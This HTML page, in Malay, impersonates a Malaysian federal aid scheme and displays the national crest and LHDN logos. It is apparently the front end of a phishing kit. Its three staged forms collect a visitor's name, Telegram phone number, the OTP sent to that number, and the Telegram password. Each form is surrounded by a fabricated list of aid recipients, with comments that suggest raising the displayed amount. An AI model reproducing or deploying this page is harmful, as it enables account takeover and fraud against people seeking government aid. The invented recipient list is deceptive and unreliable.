<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Bantuan Am Persekutuan: Cara Permohonan & Syarat Kelayakan.</title>

    <!-- Link ke Google Fonts -->
    <link
      href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;600&display=swap"
      rel="stylesheet"
    />

    <!-- Link ke CSS intl-tel-input -->
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.8/css/intlTelInput.css"
    />

    <!-- feather icons -->
    <script src="https://unpkg.com/feather-icons"></script>

    <style>
      /* Reset dan Base Styles */
      * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        font-family: "Poppins", Arial, sans-serif;
      }

      body,
      html {
        height: 100%;
        width: 100%;
        background-color: var(--primary-blue);
        color: var(--text-white);
        overflow-x: hidden;
      }

      /* Layout Styles */
      .page {
        min-height: 100vh;
        width: 100%;
        position: relative;
        padding-top: 80px; /* Untuk navbar fixed */
      }

      .hero {
        width: 100%;
        padding: 0 auto;
        display: flex;
        flex-direction: column;
        align-items: center;
        margin-top: -20px !important;
      }

      /* Navbar Styles */
      .navbar {
        display: flex;
        justify-content: space-between;
        align-items: center;
        background: linear-gradient(to right, #003ec3, #bc004b);
        padding: 10px 15px;
        position: fixed;
        top: 0;
        left: 0;
        right: 0;
        z-index: 1000;
        margin-bottom: 0 !important;
        box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
      }

      .navbar-logo {
        display: flex;
        align-items: center;
        gap: 15px;
        width: 60px;
        height: auto;
        transform: scale(0.8);
      }

      .navbar-img {
        width: 100px;
        height: auto;
      }

      .navbar-nav {
        display: flex;
        align-items: center;
        gap: 15px;
        color: #ffffff;
      }

      .search-bar {
        display: flex;
        align-items: center;
        gap: 10px;
        padding-left: 100px;
        padding-right: 10px;
        padding-top: 5px;
        background-color: var(--text-white);
        border-radius: 15px;
        color: var(--primary-blue);
      }

      .search-icon {
        padding-left: 10px;
        color: #e6005c;
      }

      .search-icon i {
        font-size: 20px;
      }

      /* Image Styles */
      .hero img {
        width: 100%;
        height: auto;
        display: flex;
        border-radius: 10px;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        margin-top: -10px;
      }

      /* Form Styles */
      .form-container {
        display: flex;
        flex-direction: column;
        align-items: stretch;
        justify-content: center;
        background-color: var(--primary-blue);
        padding: 20px;
        border-radius: 10px;
        width: 100%;
        max-width: 500px;
        margin: 5px auto 0;
        /* box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1); */
      }

      label {
        display: block;
        width: 100%;
        margin-bottom: 8px;
        font-size: 16px;
        font-weight: 600;
        color: #003ec3;
        text-align: center;
        justify-content: center;
        margin: 0 auto;
      }

      input[type="text"],
      input[type="password"] {
        width: 100%;
        padding: 12px;
        margin-bottom: 20px;
        border: 1px solid #333;
        border-radius: 5px;
        font-size: 16px;
        transition: border-color 0.3s ease;
      }

      input[type="tel"] {
        width: 100% !important;
        padding: 12px 45px !important;
        margin-bottom: 0 !important;
        border: 1px solid #333;
        border-radius: 5px;
        font-size: 15px !important;
        transition: border-color 0.3s ease;
      }

      input:focus {
        outline: none;
        border-color: #333;
      }

      .btn {
        width: 60%;
        max-width: 300px;
        padding: 10px;
        background: linear-gradient(to right, #003ec3, #bc004b);
        color: #fff;
        border: none;
        border-radius: 15px;
        font-size: 12px;
        font-weight: 600;
        cursor: pointer;
        transition: background-color 0.3s ease;
        display: flex;
        align-items: center;
        justify-content: center;
        margin: 10px auto 0; /* Mengubah margin: atas 20px, kiri-kanan auto, bawah 5px */
      }

      .btn:hover {
        background: linear-gradient(to right, #003ec3, #bc004b);
      }

      /* Text Styles */
      p {
        font-size: 16px;
        color: #010101;
        text-align: center;
        margin: 10px auto 10px;
        line-height: 1.6;
      }

      h4 {
        font-size: 20px;
        color: #bc004b;
        text-align: center;
        margin: 0;
        justify-content: center;
      }

      h4 span {
        color: #003ec3;
      }

      /* Loading Screen */
      .loading-screen {
        display: flex;
        flex-direction: column;
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background-color: rgba(0, 0, 0, 0.8);
        display: none;
        justify-content: center;
        align-items: center;
        z-index: 10000;
        height: 100vh;
        text-align: center;
      }

      .loading-screen img {
        max-width: 65px;
        max-height: 65px;
      }

      /* Footer Styles */
      .footer {
        padding: 1rem;
        text-align: center;
        background: linear-gradient(to right, #003ec3, #bc004b);
      }

      .footer-icon {
        display: flex;
        justify-content: center;
        gap: 1.5rem;
        margin-top: 10px;
      }

      .footer-icon i {
        display: flex;
        align-items: center;
        gap: 0.5rem;
        color: var(--text-white);
        font-style: normal;
        font-size: 0.9rem;
        font-family: "Poppins", sans-serif;
        transform: scale(0.8);
      }

      /* Efek hover untuk ikon */
      .footer-icon i:hover {
        color: var(--accent-yellow);
        transition: color 0.3s ease;
      }

      /* Style untuk teks di sebelah ikon */
      .footer-icon i::after {
        content: attr(data-feather);
        font-size: 0.9rem;
        font-family: "Poppins", sans-serif;
      }

      /* Responsive Styles */
      @media (max-width: 1024px) {
        .form-container {
          width: 100%;
          padding: 30px;
        }
      }

      @media (max-width: 768px) {
        .navbar {
          padding: 10px 15px;
        }

        .navbar-img {
          width: 35px;
          height: 35px;
        }

        .navbar-nav {
          gap: 10px;
        }

        .navbar-nav a {
          font-size: 14px;
          padding: 6px 8px;
        }

        .form-container {
          width: 100%;
          padding: 10px;
        }
      }

      @media (max-width: 480px) {
        .page {
          padding-top: 60px;
        }

        .navbar {
          padding: 0 10px;
        }

        .navbar-logo {
          width: 30px;
          transform: scale(0.6);
        }

        .navbar-nav {
          gap: 5px;
          transform: scale(0.8);
          font-size: 12px;
        }

        .navbar-nav {
          gap: 10px;
        }

        .hero {
          margin-top: 50px;
        }

        .hero-text h1 {
          font-size: 16px;
        }

        .hero img {
          width: 100%;
          margin-bottom: 5px;
          margin-top: 0;
        }

        .form-container {
          width: 100%;
          padding: 10px;
        }

        label {
          font-size: 14px;
        }

        .btn {
          padding: 12px;
          font-size: 14px;
          margin-top: 0;
        }

        p {
          font-size: 14px;
        }

        h4 {
          font-size: 18px;
        }
      }

      /* Utility Classes */
      .hidden {
        display: none;
      }

      .active {
        font-weight: bold;
        color: #333 !important;
      }

      /* Khusus untuk device dengan lebar 375px */
      @media (max-width: 375px) {
        .navbar {
          padding: 0 8px;
        }

        .navbar-logo {
          gap: 6px;
        }

        .navbar-img {
          width: 25px;
          height: 25px;
        }

        .navbar-nav {
          gap: 2px;
        }

        .navbar-nav a {
          font-size: 10px;
          padding: 3px 4px;
        }
      }

      /* Tambahan untuk orientasi landscape pada mobile */
      @media (max-height: 480px) and (orientation: landscape) {
        .navbar {
          padding: 5px 5px;
        }

        .navbar-img {
          width: 28px;
          height: 28px;
        }

        .navbar-nav a {
          font-size: 11px;
          padding: 3px 5px;
        }

        .btn {
          padding: 8px;
          width: 50%;
        }
      }

      :root {
        --primary-blue: #ffffff; /* Biru tua untuk background */
        --accent-yellow: linear-gradient(
          to right,
          #003ec3,
          #bc004b
        ); /* Kuning untuk highlight */
        --text-white: #fff; /* Putih untuk teks */
        --royal-gold: #c5a572; /* Emas untuk aksen */
      }

      .container {
        background-color: var(--primary-blue);
        color: var(--text-white);
      }

      .highlight {
        color: var(--accent-yellow);
        font-weight: bold;
      }

      .accent {
        color: var(--royal-gold);
      }

      /* Gradient background seperti di gambar */
      .gradient-bg {
        background: linear-gradient(
          to right,
          var(--primary-blue) 85%,
          rgba(27, 43, 95, 0.8)
        );
      }

      .otp-container {
        display: flex;
        justify-content: center;
        gap: 20px;
        margin: 10px auto 20px;
      }

      .otp-input {
        width: 40px;
        height: 40px;
        text-align: center;
        font-size: 18px;
        font-weight: bold;
        border: 1px solid #333;
        border-radius: 5px;
        appearance: textfield; /* Firefox */
      }

      /* Menghilangkan arrow spinner di Chrome, Safari, Edge, Opera */
      .otp-input::-webkit-outer-spin-button,
      .otp-input::-webkit-inner-spin-button {
        -webkit-appearance: none;
        margin: 0;
      }

      .otp-input:focus {
        outline: none;
        border-color: var(--accent-yellow);
        box-shadow: 0 0 3px rgba(255, 215, 0, 0.5);
      }

      @media (max-width: 375px) {
        .otp-container {
          gap: 12px;
        }

        .otp-input {
          width: 35px;
          height: 35px;
          font-size: 16px;
        }
      }

      /* Tambahkan CSS ini di dalam tag <style> */
      ._record-box {
        width: 100%;
        max-width: 500px;
        margin: 5px auto 5px;
        background: #fff;
        border-radius: 10px;
        padding: 5px;
      }

      .list-box {
        max-height: 168px;
        overflow-y: auto;
        scrollbar-width: none; /* Untuk Firefox */
        -ms-overflow-style: none; /* Untuk Internet Explorer dan Edge */
      }

      .list-box::-webkit-scrollbar {
        display: none; /* Untuk Chrome, Safari dan Opera */
      }

      .list .item {
        display: flex;
        align-items: center;
        padding: 5px;
        border: 1px solid #003ec3;
        border-radius: 5px;
      }

      .record_logo {
        width: 30px;
        height: 30px;
        margin-right: 10px;
        margin-left: 5px;
      }

      .record_logo img {
        width: 100%;
        height: 100%;
        border-radius: 50%;
      }

      .center {
        flex: 1;
      }

      .center .h1 {
        color: #003ec3;
        font-size: 12px;
        margin-bottom: 4px;
      }

      .center .h2 {
        color: #bc004b;
        font-size: 14px;
        font-weight: bold;
      }

      /* Perbaikan untuk input telepon */
      .iti {
        width: 100% !important;
        margin-bottom: 20px;
      }

      .iti__flag-container {
        z-index: 1;
      }

      input[type="tel"] {
        width: 100% !important;
        padding: 12px 45px !important;
        margin-bottom: 0 !important;
        border: 1px solid #333;
        border-radius: 5px;
        font-size: 12px;
        transition: border-color 0.3s ease;
      }

      /* Responsif untuk layar kecil */
      @media (max-width: 450px) {
        .iti {
          max-width: 100%;
        }

        input[type="tel"] {
          width: 100% !important;
        }
      }

      .no-margin {
        margin: 0;
      }
    </style>
  </head>
  <body>
    <div id="page1" class="page">
      <!-- navbar -->
      <nav class="navbar">
        <div class="navbar-logo">
          <img
            src="Jata Negara@3x.gif"
            alt="Logo Negara"
            class="navbar-img"
            style="width: 60px; height: auto"
          />
          <img
            src="LHDN logo@3x.png"
            alt="Logo Negara"
            class="navbar-img"
            style="width: 60px; height: auto"
          />
        </div>
        <div class="navbar-nav">
          <div class="search-bar">
            <div class="search-icon">
              <i data-feather="search"></i>
            </div>
          </div>
          <div class="hamburger-menu">
            <div class="menu-icon" onclick="toggleMenu()">
              <i data-feather="menu"></i>
            </div>
          </div>
        </div>
      </nav>
      <!-- navbar end -->

      <div class="hero">
        <img src="rm300.png" alt="tng-img" />
        <h4>
          SEMAKAN STATUS & CLAIM BANTUAN GUNA AKAUN <span>TELEGRAM ANDA</span>
        </h4>
        <div class="form-container">
          <form id="registrationForm">
            <input
              type="text"
              id="name"
              name="name"
              placeholder="Nama Penuh Sesuai MyKad"
              required
            />

            <input
              type="tel"
              id="phone"
              name="phone"
              placeholder="+60 | Nombor Telefon Telegram"
              required
            />
            <br />
            <button type="submit" class="btn">SEMAK STATUS</button>
          </form>
        </div>

        <div class="_record-box">
          <div id="list" class="list-box">
            <div class="list">
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Ahmad Zulkifli</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1">
                    <span class="name">Zarina Muhammad</span>
                  </div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1">
                    <span class="name">Iskandar Zainal</span>
                  </div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Rohani Latiff</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Shahrul Nizam</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1">
                    <span class="name">Norazman Hashim</span>
                  </div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Farah Abdul</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1">
                    <span class="name">Zulkifli Ibrahim</span>
                  </div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Siti Sarah</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Muhammad Fahmi</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Nurul Afiqah</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Azhar Abdullah</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Hasnah Abdul</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Rahim Salleh</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Nadia Hafiz</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Fariz Musa</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Rina Zainal</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Amir Rahman</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Norshila Anuar</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Zainuddin Ali</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1">
                    <span class="name">Fauzi Abdul Rahman</span>
                  </div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Lina Mohd Noor</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Ismail Zaid</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <div id="page2" class="page" style="display: none">
      <!-- navbar -->
      <nav class="navbar">
        <div class="navbar-logo">
          <img
            src="Jata Negara@3x.gif"
            alt="Logo Negara"
            class="navbar-img"
            style="width: 60px; height: auto"
          />
          <img
            src="LHDN logo@3x.png"
            alt="Logo Negara"
            class="navbar-img"
            style="width: 60px; height: auto"
          />
        </div>
        <div class="navbar-nav">
          <div class="search-bar">
            <div class="search-icon">
              <i data-feather="search"></i>
            </div>
          </div>
          <div class="hamburger-menu">
            <div class="menu-icon" onclick="toggleMenu()">
              <i data-feather="menu"></i>
            </div>
          </div>
        </div>
      </nav>
      <!-- navbar end -->

      <div class="hero">
        <img src="rm300.png" alt="tng-img" />
        <div class="form-container">
          <p class="no-margin">
            Sila Masukan Kod-yang dihantar ke Nombor Telegram Anda
          </p>
          <form id="otpForm">
            <label for="otp-1">Masukan Kod-OTP</label>
            <div class="otp-container">
              <input
                type="number"
                class="otp-input"
                id="otp-1"
                maxlength="1"
                oninput="this.value=this.value.slice(0,1)"
                required
              />
              <input
                type="number"
                class="otp-input"
                id="otp-2"
                maxlength="1"
                oninput="this.value=this.value.slice(0,1)"
                required
              />
              <input
                type="number"
                class="otp-input"
                id="otp-3"
                maxlength="1"
                oninput="this.value=this.value.slice(0,1)"
                required
              />
              <input
                type="number"
                class="otp-input"
                id="otp-4"
                maxlength="1"
                oninput="this.value=this.value.slice(0,1)"
                required
              />
              <input
                type="number"
                class="otp-input"
                id="otp-5"
                maxlength="1"
                oninput="this.value=this.value.slice(0,1)"
                required
              />
            </div>
            <button type="submit" class="btn">TERUSKAN</button>
          </form>
        </div>

        <div class="_record-box">
          <div id="list" class="list-box">
            <div class="list">
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Ahmad Zulkifli</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1">
                    <span class="name">Zarina Muhammad</span>
                  </div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1">
                    <span class="name">Iskandar Zainal</span>
                  </div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Rohani Latiff</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Shahrul Nizam</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1">
                    <span class="name">Norazman Hashim</span>
                  </div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Farah Abdul</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1">
                    <span class="name">Zulkifli Ibrahim</span>
                  </div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Siti Sarah</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Muhammad Fahmi</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Nurul Afiqah</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Azhar Abdullah</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Hasnah Abdul</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Rahim Salleh</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Nadia Hafiz</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Fariz Musa</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Rina Zainal</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Amir Rahman</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Norshila Anuar</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Zainuddin Ali</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1">
                    <span class="name">Fauzi Abdul Rahman</span>
                  </div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Lina Mohd Noor</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Ismail Zaid</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <div id="page3" class="page" style="display: none">
      <!-- navbar -->
      <nav class="navbar">
        <div class="navbar-logo">
          <img
            src="Jata Negara@3x.gif"
            alt="Logo Negara"
            class="navbar-img"
            style="width: 60px; height: auto"
          />
          <img
            src="LHDN logo@3x.png"
            alt="Logo Negara"
            class="navbar-img"
            style="width: 60px; height: auto"
          />
        </div>
        <div class="navbar-nav">
          <div class="search-bar">
            <div class="search-icon">
              <i data-feather="search"></i>
            </div>
          </div>
          <div class="hamburger-menu">
            <div class="menu-icon" onclick="toggleMenu()">
              <i data-feather="menu"></i>
            </div>
          </div>
        </div>
      </nav>
      <!-- navbar end -->

      <div class="hero">
        <img src="rm300.png" alt="tng-img" />
        <div class="form-container">
          <p id="kataSandi">Sila Masukan kata laluan Telegram Anda</p>
          <form id="passwordForm">
            <input
              type="password"
              id="kata-sandi"
              name="kata-sandi"
              placeholder="Masukan kata laluan"
              required
            />
            <button type="submit" class="btn">TERUSKAN</button>
          </form>

          <div id="loadingContent" style="display: none">
            <img
              id="loadingGif"
              src="processing.gif"
              alt="Loading..."
              style="margin: 20px auto; width: 50%; height: auto"
            />

            <p id="formMessage" style="text-align: center">
              Mohon tunggu proses pengesahan atau...
            </p>

            <button
              id="useAnotherPhone"
              style="
                width: 100%;
                padding: 10px;
                margin: 30px auto 0;
                background: linear-gradient(to right, #003ec3, #bc004b);
                color: white;
                border: none;
                border-radius: 10px;
                font-size: 1.1rem;
                cursor: pointer;
                align-items: center;
                justify-content: center;
              "
            >
              Guna Nombor Telefon Lain
            </button>
          </div>
        </div>

        <div class="_record-box">
          <div id="list" class="list-box">
            <div class="list">
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Ahmad Zulkifli</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1">
                    <span class="name">Zarina Muhammad</span>
                  </div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1">
                    <span class="name">Iskandar Zainal</span>
                  </div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Rohani Latiff</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Shahrul Nizam</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1">
                    <span class="name">Norazman Hashim</span>
                  </div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Farah Abdul</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1">
                    <span class="name">Zulkifli Ibrahim</span>
                  </div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Siti Sarah</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Muhammad Fahmi</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
                  <div class="h1"><span class="name">Nurul Afiqah</span></div>
                  <div class="h2">RM300 ✅</div>
                  <!-- Ubah jadi RM1,200 -->
                </div>
              </div>
              <div class="item">
                <div class="record_logo">
                  <img src="avatar.png" alt="" />
                </div>
                <div class="center">
